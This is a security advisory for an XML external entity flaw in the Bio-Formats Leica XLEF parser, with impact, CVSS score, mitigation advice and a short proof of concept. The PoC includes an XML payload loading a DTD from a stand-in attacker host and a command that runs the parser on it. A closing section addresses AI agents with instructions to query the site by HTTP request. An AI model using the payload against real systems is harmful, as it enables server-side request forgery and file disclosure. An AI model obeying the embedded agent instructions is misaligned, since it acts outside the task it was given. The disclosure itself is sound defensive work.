# Bio-Formats XXE in Leica Metadata Parser (CVE-2026-22186)

**Author:** Beatriz Fresno Naumova, Ron Edgerson

**Date:** 18/03/2026 (Github Advisory)

**Vendor:** Open Microscopy Environment

**Product:** Bio-Formats

**Version Affected:** ≤ 8.4.0

**Fixed Version:** 8.5.0

**Component:** Leica metadata parser (XLEF)

**CWE:** CWE-611 – Improper Restriction of XML External Entity Reference

**Attack Vector:** Local 

### Description

Bio-Formats versions up to and including 8.4.0 contain an **XML External Entity (XXE)** vulnerability in the Leica metadata parsing component (XLEF).

The parser uses an insecure configuration of `DocumentBuilderFactory`, allowing external entity expansion and loading of external DTDs. As a result, a specially crafted XML metadata file can trigger unintended behavior during parsing.

### Impact

Successful exploitation may allow:

* Server-Side Request Forgery (**SSRF**) via outbound network requests
* Access to local system resources (if readable)
* Denial of Service (**DoS**) during XML parsing

### CVSS Details

**CVSS v3.1 Vector:**\
`CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H`

**Base Score:** 7.1 (**High**)

### Proof of Concept (PoC)

#### Steps to Reproduce

1. Install a vulnerable version of Bio-Formats (≤ 8.3.0).
2. Prepare a malicious XLEF/XML file containing an external entity:

```xml
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd">
]>
<root>&xxe;</root>
```

3. Execute the Bio-Formats analysis tool with the crafted file:

```
java -cp bioformats_package.jar \
     loci.formats.tools.ImageInfo xxe_blind.xlef
```

4. Observe outbound network requests or unintended resource access triggered during XML parsing.

### Mitigation

* Disable external entity processing in XML parsers
* Configure DocumentBuilderFactory securely:
  * FEATURE\_SECURE\_PROCESSING
  * Disable DTDs and external entities
* Validate and sanitize XML inputs before processing
* Update to a patched version when available

### Discoverer

* Beatriz Fresno Naumova
* Ron Edgerson

### References

* **NVD:** <https://nvd.nist.gov/vuln/detail/CVE-2026-22186>
* **VulnCheck Advisory:** <https://www.vulncheck.com/advisories/bio-formats-xxe-in-leica-xlef-metadata-parser>
* **Bio-Formats (Github Advisory):** [https://github.com/ome/bioformats/security/advisories/GHSA-x9vc-qh97-8gj](https://github.com/ome/bioformats/security/advisories/GHSA-x9vc-qh97-8gjp)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/cve-and-poc/bio-formats-xxe-in-leica-metadata-parser-cve-2026-22186.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.